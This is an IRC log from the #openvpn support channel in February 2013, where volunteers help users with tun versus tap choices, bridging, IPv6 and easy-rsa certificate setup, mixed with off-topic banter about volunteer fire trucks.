[sauce@ool-ad02ad20.dyn.optonline.net] has quit [Changing host] 22:28 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 22:28 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 22:28 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] 
has quit [Changing host] 22:28 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 22:32 -!- kirin` [telex@gateway/shell/anapnea.net/x-uvulotxunalwtwsa] has quit [Ping timeout: 276 seconds] 22:33 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Connection reset by peer] 22:33 -!- kirin` [telex@gateway/shell/anapnea.net/x-hryuvdfbqaqdnpes] has joined #openvpn 22:33 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 22:35 < nutcase> Is it possible to only send certain traffic over the VPN? 22:36 < pekster> nutcase: Either define routes to specific hosts/networks, or use policy routing to use whatever detection your OS supports to choose the gateway 22:38 < nutcase> hm 22:38 < nutcase> It might just be easier to run a VM for the vpn lol 22:39 < pekster> LARTC's howto can give you an intro to policy routing on Linux. Other OS's have different ways to do that 22:39 -!- kirin` [telex@gateway/shell/anapnea.net/x-hryuvdfbqaqdnpes] has quit [Ping timeout: 255 seconds] 22:40 < pekster> Windows, for instance, doesn't have any support unless you pay for one of their advanced server operating systems ;) 22:40 < pekster> (yes, that's how they "reward" you for buying a $200 Windows 8 Professional edition ;) 22:40 < uberushaximus> I thought it was more than that 22:40 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbaexttbrbduwkdu] has joined #openvpn 22:40 < pekster> That's the US price anyway 22:40 < uberushaximus> isn't that just the core to pro upgrade? 22:41 < pekster> Oh, maybe. I dunno. There was some $40 upgrade deal that ended on 1/31 for XP through Win7 users. I didn't feel like feeding the troll more money for an OS that, under the hood, hasn't really changed since Vista SP1 22:42 < uberushaximus> indeed 22:42 < pekster> They added NFS support, native iso mounting, and stopped a few services from running at boot. 
But now they need people to upgrade so they can get more support for Metro that they're betting bank on 22:42 < pekster> It's just dumb 22:42 < pekster> Anyway, no policy routing there either, at least not without fancy 3rd party tools 22:42 < pekster> :) 22:46 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbaexttbrbduwkdu] has quit [Ping timeout: 256 seconds] 22:47 -!- kirin` [telex@gateway/shell/anapnea.net/x-chfswjelxyrqjskf] has joined #openvpn 22:48 < Devastator> oh well.. 22:48 < Devastator> time for me to rest.. this thing is driving me nuts heheh 22:53 -!- kirin` [telex@gateway/shell/anapnea.net/x-chfswjelxyrqjskf] has quit [Ping timeout: 264 seconds] 22:54 -!- kirin` [telex@gateway/shell/anapnea.net/x-bycvgppbjdznazft] has joined #openvpn 22:56 < Devastator> at least I think I'm doing the right thing now.. 23:14 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 23:20 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 246 seconds] 23:24 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 23:44 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Ping timeout: 240 seconds] 23:50 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn --- Day changed Fri Feb 08 2013 00:11 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn 01:33 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 245 seconds] 01:34 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 01:37 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 01:57 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:01 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 
02:11 -!- kothog [~kothog@unaffiliated/kothog] has quit [Ping timeout: 244 seconds] 02:15 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has joined #openvpn 02:15 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has quit [Changing host] 02:15 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 02:18 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 02:44 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 02:44 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 02:46 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 02:46 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 02:52 -!- zz_AsadH is now known as AsadH 03:18 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 03:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:33 -!- dazo_afk is now known as dazo 03:38 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:35 -!- p3rror [~mezgani@2001:0:53aa:64c:1889:2fc2:d673:9d81] has joined #openvpn 04:38 -!- kothog [~kothog@unaffiliated/kothog] has quit [Read error: Operation timed out] 04:39 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has joined #openvpn 04:39 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has quit [Changing host] 04:39 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 04:53 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 264 seconds] 04:55 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Read error: Connection reset by peer] 05:01 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds] 05:03 -!- AsadH is now known as zz_AsadH 05:14 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has left #openvpn ["WeeChat 0.4.0-dev"] 05:16 -!- VunKruz 
[~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 05:24 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 05:42 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 05:44 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 05:44 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 05:53 -!- [Xaronic] is now known as ForkingH1tl3r 06:05 -!- zz_AsadH is now known as AsadH 06:06 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:31 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection timed out] 06:32 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 06:36 -!- ForkingH1tl3r is now known as [Xaronic] 06:45 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 06:50 -!- p3rror [~mezgani@2001:0:53aa:64c:1889:2fc2:d673:9d81] has quit [Ping timeout: 245 seconds] 06:57 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:02 -!- master_of_master [~master_of@p57B532CC.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 07:03 -!- p3rror [~mezgani@2001:0:53aa:64c:3844:2fc2:d606:77cf] has joined #openvpn 07:04 -!- master_of_master [~master_of@p57B520BD.dip.t-dialin.net] has joined #openvpn 07:30 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 07:31 -!- [Xaronic] is now known as Sp00n 07:31 -!- Sp00n [~Xaronic]@occupyuk.co.uk] has quit [Disconnected by services] 07:31 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn 07:36 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 07:36 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 07:37 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:42 < Holiday> quick question... I'm doing tap mode and setting up a the ethernet bridge via a bash script.. the br0 address is the same as the physical ethernet device, but the tap0 doesn't only lists an ipv6 address.. 
should it also have an IP/gateway/etc or does that appear when someone connects? 07:44 <@plaisthos> when using bridges only the bridge should have ip addresse, the members should have none 07:45 < Holiday> okay sweet. I wanted to double check before I proceeded with the test 07:48 -!- Holiday [~rjr162@128.118.15.39] has quit [Read error: Connection reset by peer] 07:48 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 07:49 <@dazo> Holiday: why do you bridge? 07:50 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Bridging? Yes, we will ask you why you do that many times! || Your problem is probably 07:51 < havoc> dazo: looks like topic got truncated 07:51 <@dazo> crap! 07:51 < havoc> ending with: "...|| Your problem is probably" 07:51 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably firewall, Really ||Not a native English speaker? say so! 07:52 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably firewall, Really ||Not a native English speaker? say so! 
07:52 <@dazo> could probably just change that truncation to say: Your problem is probably you .... :-P 07:52 < havoc> Did you want a space after the '||' in "||Not a native English speaker?" ? 07:52 < rob0> haha 07:52 -!- Holiday [~rjr162@128.118.15.39] has quit [Read error: Connection reset by peer] 07:52 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably firewall, Really || Not a native English speaker? say so! 07:53 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 07:53 < Holiday> Well, I figured that would be the best option for what we're doing (but it may not be) 07:53 < havoc> dazo: :) 07:53 < rob0> !tunortap 07:53 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 07:53 <@dazo> Holiday: why do you think it is the best option? 07:53 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 07:54 <@plaisthos> dazo: you could add iOS to OpenVPN RELEASED FOR ANDROID! 07:54 <@dazo> plaisthos: nah ... 
I don't see the source for that one ;-) 07:54 < Holiday> dazo: initially the other guy I'm working with on this was trying to get an IPsec/L2TP vpn going (but that's just a pain in the butt) so I'm trying openvpn and from what I read the tap + bridge may be the best setup 07:55 <@dazo> Holiday: that is not telling my why bridging is best 07:55 < Holiday> dazo: he's trying to keep the clients in an IP range (.127 to .145) that's in the same subnet as the server 07:55 <@dazo> Holiday: why? 07:55 <@plaisthos> dazo: I think the OpenVPN RELEASED FOR ANDROID was added when OpenVPN Connect hit the Play Store ;) 07:55 < Holiday> dazo: he's stubborn and has his reasons lol (plus they're a bit funky about private IP's here) 07:56 <@dazo> Holiday: non-bridge doesn't mean you don't control the VPN IPs 07:56 <@dazo> Holiday: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 07:56 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 07:56 < Holiday> dazo: if you think non-bridged would be better, although the other guy doesn't want to use NAT or MASQ.. I'm really hoping for some good insight (I read all 48 pages of the man files and I'm still at this point lol) 07:56 < rob0> The !tunortap factoid gave a little overview of when to use tap. 07:56 <@dazo> Holiday: my policy is that I don't help people with bridges before I get a reasonable explanation why to use bridges 07:57 < havoc> but routing requires cooperation by the guy on the other end, which may or may not be possible? 07:57 <@dazo> that's anyhow a human issue ... 
not a technical issue ;-) 07:57 < havoc> dazo: but still justification for bridge mode :) 07:58 <@dazo> havoc: not in my book ;-) 07:58 < havoc> dazo: if you don't have control over the remote network, you don't have a choice 07:58 <@dazo> havoc: you have always a choice 07:58 < havoc> I'm not saying that's Holiday's case, I'm just pointing it out 07:59 < havoc> dazo: ...to not do it at all 07:59 < Holiday> dazo: Initially having read that with the IPv6 and same broadcast domain sounded like what he wants (plus we've been big into getting into IPv6 so at *some point* (when everyone else.. ISPs etc catch up) we'll want that) 07:59 <@dazo> Holiday: OpenVPN 2.3 supports IPv6 07:59 <@dazo> in tun 07:59 < Holiday> dazo: but for the time if I can get away non-bridged and it's easier, I'm all for it. At this point I just want this thing up lol 08:00 <@dazo> Holiday: most support cases here which starts with bridging (that's something like 99% of the cases) ends up with having less troubles and an easier config using a routed setup 08:00 < Holiday> dazo: I'll let the other guy know.. he's also a stickler for repo's.. he has to build the packages himself and only did the 2.2.1 because he wasn't sure if 2.3 was 100% yet.. but he's willing to swap that that's not a problem. But minus the IPv6, I should just forgo the bridge 08:01 < Holiday> dazo: so should I stick with tap or go tun if I'm not doing a bridge? 08:01 <@dazo> Holiday: and the biggest issue with bridging is scalability and a massive amount of broadcast traffic which lowers the performance ... 08:01 < havoc> Holiday: bridging is also problematic as it adds another point of failure; the bridge 08:02 <@dazo> Holiday: go for tun ... if you read that wiki page I sent you, it's all explained there 08:02 < Holiday> dazo & havoc: which is what I'm trying to get away from.. 
just like with the IPsec/L2TP + ppp you have a lot of layers where one incompatibility or whatever makes the whole thing barf 08:02 < havoc> gah, I still have much to convert to TUN :( 08:03 < Holiday> dazo: okay thanks! I'll modify what I have but I'm sure I'll be back with more issues lol (hopefully not though) 08:03 <@dazo> Holiday: if you know network routing .... you'll have solved tun mode easily 08:04 <@dazo> (and it will perform better than tap too) 08:05 <@plaisthos> and mobile phone client don't lack tap at all 08:06 <@dazo> s/n't// ?? 08:07 <@plaisthos> s/lack/like/ 08:07 <@dazo> ahh :) 08:09 <@plaisthos> !learn tunortap as Normal Android/iOS devices (not rooted/jailbroken) support only tun. 08:09 <@vpnHelper> Joo got it. 08:09 <@plaisthos> !tunortap 08:09 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against 08:09 <@vpnHelper> you over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 08:21 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 08:22 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 08:25 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has joined #openvpn 08:33 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 08:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:45 < fys> I officially hate Lousiana. 
08:46 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 08:47 < fys> well it'd help if i spelled their shitty state's name right 08:49 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 08:55 -!- p3rror [~mezgani@2001:0:53aa:64c:3844:2fc2:d606:77cf] has quit [Ping timeout: 245 seconds] 08:55 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn 08:55 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host] 08:55 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:59 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has quit [Ping timeout: 248 seconds] 08:59 < rob0> The Great Firewall of Lousyana? 09:00 <@novaflash> :) 09:00 < fys> lol 09:00 < EugeneKay> Everybody does, fys. 09:00 <@novaflash> i knew a girl like that once 09:00 < fys> No, they have one of the few states that require a title be signed in front of a notary public. 09:00 < fys> And I need this title signed. 09:00 < EugeneKay> Car? 09:01 < fys> I'm not in Lousiana 09:01 < fys> Nah, scooter. 09:01 < EugeneKay> Close enough 09:01 * EugeneKay goes back to drooling over new fire trucks 09:01 < fys> New.. fire.. trucks? 09:01 < fys> Okay.. 09:01 < fys> o_o 09:01 <@novaflash> EugeneKay's experiencing his third childhood 09:01 < fys> lol 09:02 < EugeneKay> I'm a volunteer firefighter :-p 09:02 <@novaflash> it's actually still the first - he never grew out of it - but by counting the years of an average childhood, he's in his third childhood now 09:02 < EugeneKay> ....I'm only 24 09:02 <@novaflash> that's very laudable EugeneKay :) 09:02 < EugeneKay> And no, I didn't. :-p 09:02 < fys> I'm 24 too and not even close to exiting childhood. 09:02 <@novaflash> you young whippersnappers 09:03 < EugeneKay> But continuing my childhood is when I play with my legos(also mostly firefighter kits). This is srs bzns :-p 09:03 < rob0> EugeneKay! Me too! 
09:03 < EugeneKay> Our dept is applying for a FEMA grant to get a new truck. So, I'm drooling. 09:03 <@novaflash> legos is serious. 09:03 <@novaflash> neat 09:03 < rob0> We got a nice new truck in late '11 09:03 < EugeneKay> Commercial chassis or a proper cabover? 09:03 <@novaflash> rob0; 1911? 09:04 < EugeneKay> No no, the 1911 is in it's holster in my underwear drawer 09:04 < EugeneKay> next to my 459 09:04 < rob0> let me see if I can google up a picture 09:04 < EugeneKay> And my 22 >_> 09:04 < EugeneKay> I think the .38 Special is in there too 09:04 -!- cosmicgate [~root@94.249.242.85] has joined #openvpn 09:04 < EugeneKay> Come to think of it, that's not the underwear drawer at all. It's the gun drawer. 09:05 <@novaflash> underwear is where i keep my biological gun 09:06 < EugeneKay> Anyway..... yeah, new truck :-D 09:06 < EugeneKay> Hopefully we get the grant 09:06 < rob0> This vehicle pictured above is an E-ONE Tradition ES Commercial Pumper mounted on a Prep M2 Chassis. Purchased by Chief Dewayne Lovelace and the Valley Grove Fire Department, 5th Distric of Tishomingo County, Belmont, Mississippi. Shop Order #136313. http://www.sunbeltfire.com/recent-deliveries.html top right 09:06 <@vpnHelper> Title: Sunbelt Fire - Serving the Fire industry (at www.sunbeltfire.com) 09:06 * EugeneKay looks to see if it came through today 09:06 < EugeneKay> Nice rig. Looks remarkably like the one we have spec'ed 09:06 < EugeneKay> Top-mount pump controls? 09:07 < rob0> yes, the walkway behind the cab 09:07 < EugeneKay> Very nice 09:07 < EugeneKay> Are your ladders under the hosebed or down the right ide? 09:07 < rob0> oh hey, Red Bay's truck is also there. "Big" nearby town. 09:08 < rob0> ladders on the right 09:08 -!- p3rror [~mezgani@2001:0:53aa:64c:2484:2fc2:d606:f5f2] has joined #openvpn 09:08 < EugeneKay> We're going for under-hose. 
We need the storage space 09:08 <@novaflash> ladies and gentleman, this is no longer #openvpn but #bigredfiretrucks 09:08 <@ecrist> i like to be under hoes. sometimes they're under me 09:09 < EugeneKay> Damn right it is 09:09 <@novaflash> ecrist: good moment to pitch in - i was just thinking how bigredfiretrucks could be a name for a porn site where the sluts handle guys with big hoses 09:09 < rob0> we also have an old tanker, converted milk truck. That's what we usually take to fires, because there are few fires in our area, we go as backup. And they want the water! 09:09 < EugeneKay> Damn, they haven't updated the list for today yet 09:09 * novaflash slaps BRAZZERS logo onto channel 09:10 <@ecrist> EugeneKay: what town are you looking for? 09:10 < EugeneKay> We have.... a 1984 Pierce pumper(second-hand from a NY dept), a big brush truck, two ~2000gallon tankers(one with 6x6), and a Chevy 350 pickup with a rescue body installed 09:10 -!- dazo is now known as dazo_afk 09:10 < EugeneKay> ecrist - I'm Fairview Rural Fire Dept, Arkansas 09:13 -!- p3rror [~mezgani@2001:0:53aa:64c:2484:2fc2:d606:f5f2] has quit [Max SendQ exceeded] 09:14 <@ecrist> that's a rather new fire dept 09:15 < EugeneKay> 80-something 09:15 <@ecrist> Filing date of Januar, 2004 09:15 <@ecrist> January* 09:15 <@ecrist> maybe the incorporation is new 09:15 < EugeneKay> The non-profit incorporation? 09:16 <@ecrist> yeah 09:16 <@ecrist> EIN 71-0688930 09:16 < EugeneKay> Yeah, no idea about that 09:16 < EugeneKay> I know the dept was started in the 80s 09:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 276 seconds] 09:16 <@ecrist> reported assets of $303,239 FY 2011 09:17 < EugeneKay> Sounds about right 09:17 < rob0> wow, them is some bucks! 09:17 < EugeneKay> I know our annual operating budget is ~$30k 09:17 <@ecrist> assets include equipment, rob0 09:17 < rob0> We have about a grand or so. 
09:17 < rob0> county owns our equipment 09:17 <@ecrist> EugeneKay: operating budget FY was reported at $46,239 09:18 < EugeneKay> That includes the grant money :-p 09:18 < cosmicgate> not bad 09:19 < rob0> so your new truck will be in the $200K range? 09:19 < EugeneKay> Sounds right. I'm not on the board, so I don't know all the numbers offhand 09:19 < rob0> I think ours was ~$180K. 09:20 < EugeneKay> Buuuuut, it really comes down to whether we get the truck grant 09:20 < EugeneKay> I think they cover 80% of it 09:20 -!- krzee [nobody@hemp.ircpimps.org] has quit [Ping timeout: 245 seconds] 09:24 < EugeneKay> I want to get myself a new pickup next year, equip it out as a reserve unit. 09:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:35 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 09:36 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 09:37 -!- nickanderson_afk is now known as nickanderson 09:50 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 09:51 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection] 10:10 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 255 seconds] 10:12 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:19 -!- Orbi [~opera@anon-185-149.vpn.ipredator.se] has joined #openvpn 10:20 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 10:21 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Read error: No route to host] 10:41 -!- cosmicgate [~root@94.249.242.85] has quit [Ping timeout: 248 seconds] 10:56 -!- raidz_away is now known as raidz 10:58 -!- AsadH is now known as zz_AsadH 11:02 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn 11:02 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host] 11:02 -!- ben1066_ [~quassel@unaffiliated/ben1066] has joined 
#openvpn 11:03 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer] 11:06 < RealRancor> Hi. Is anyone running IPv6 with openvpn? I'm trying to get this to work with OpenVPN 2.3 (on client and server) but can't get my client to communicate with the "outer world". 11:06 < RealRancor> My client is able to reach (ping) the IPs of the server, but not anything outside. 11:06 < RealRancor> The relevant details are posted here: 11:06 < RealRancor> http://pastebin.com/hLGAr14v 11:07 < RealRancor> The server is running on debian 6.0, the client on debian testing. 11:08 < RealRancor> Hope all needed infos are posted, if not please let me now. Any hints are welcome. 11:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:09 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 260 seconds] 11:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 11:13 -!- corretico [~luis@190.211.93.38] has joined #openvpn 11:16 -!- thansen [~thansen@63-248-42-154.static.orml012.digis.net] has joined #openvpn 11:17 < thansen> seemingly randomly I'm getting a TLS_ERROR: BIO read tls_read_plaintext error: error:1408F06B:SSL routines:SSL3_GET_RECORD:bad decompression 11:18 < thansen> from my client. I just rebooted but had a working connection before the reboot so I'm assuming something has gone awry on my client machine 11:18 < thansen> anyone have a tip for me? 11:22 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 11:24 < lickalott> gents, trying to source ./vars and I keep getting this error "NOTE: If you run ./clean-all, I will be doing a rm -rf on /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys" 11:24 < lickalott> I'm following this - http://tomatousb.org/tut:openvpn 11:24 <@vpnHelper> Title: OpenVPN - TomatoUSB (at tomatousb.org) 11:24 < lickalott> am I missing something? 
11:24 < lickalott> *note* just for the key generation not the firmware 11:28 < RealRancor> lickalott: Mhhh, i got the same. This is just a NOTE, no error. 11:28 < RealRancor> Got the same note and all keys where generated here. 11:29 < lickalott> i don't see the keys dir 11:30 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:31 < RealRancor> source ./vars don't generate the keys, you have to follow the other steps 11:33 < lickalott> just worked 11:33 < lickalott> tks... I just assumed that the error was talking about /keys and that it needed to be there. 11:38 -!- Orbi [~opera@anon-185-149.vpn.ipredator.se] has quit [Quit: Orbi] 11:39 < lickalott> okay, i'm good on the keys now. here's my other question. I don't want to generate and/or store the keys on the router so i want my ubuntu server to be the CA (which seems to be the case now) Once in the admin GUI I can easily direct to the server for keys right? 11:46 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has joined #openvpn 11:54 < Greek-Boy> Hello guys. Just need some advise on a OpenVPN setup. I have a Voip softswitch that routes calls to multiple branches that are behind NAT. I was thinking that I should make the softswitch an openvpn server and put a pfsense at each branch and connect them via openvpn. Is this advisable or is it perhaps better to have the softswitch establish an openvpn connection to each pfsense at branches? 
12:04 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 12:15 <@ecrist> Greek-Boy: sounds smart to me 12:15 <@ecrist> then you don't need to deal with SRTP/SIPS between branches 12:16 < Greek-Boy> thanks 12:16 < Greek-Boy> just wanted to make sure that it makes sense 12:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 12:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer] 12:23 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 12:24 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 12:26 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has quit [Remote host closed the connection] 12:26 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has joined #openvpn 12:41 -!- dazo_afk is now known as dazo 12:42 < Greek-Boy> ecrist: Will openvpn be stable with good uptime? 12:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 12:52 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 12:58 <@dazo> lickalott: you have the right approach, not having the CA on your openvpn box ... all you need on your openvpn server is dh*.pem, server.key, server.crt and ca.crt .... 
the clients only need client.key, client.crt and ca.crt 12:58 <@dazo> lickalott: your CA files (the easy-rsa files) can be completely off-line until you need to generate new keys/certs 13:00 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Remote host closed the connection] 13:02 <@ecrist> Greek-Boy: depends on your internet connection 13:02 <@ecrist> the only time our vpn link goes down is because of a general transport error of some sort 13:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:38 -!- [WDKevin] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn 13:41 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has quit [Ping timeout: 248 seconds] 13:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 14:19 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 14:23 -!- novaflash is now known as novaflash_away 14:23 -!- novaflash_away is now known as novaflash 14:31 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 14:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:08 -!- thansen [~thansen@63-248-42-154.static.orml012.digis.net] has left #openvpn ["Ex-Chat"] 15:15 -!- r3zon8 [~r3zon8@vpn.interimhealthcare.com] has joined #openvpn 15:17 < r3zon8> someone using a syno nas as vpn server with ios clients? 15:22 < pekster> Probably not. 
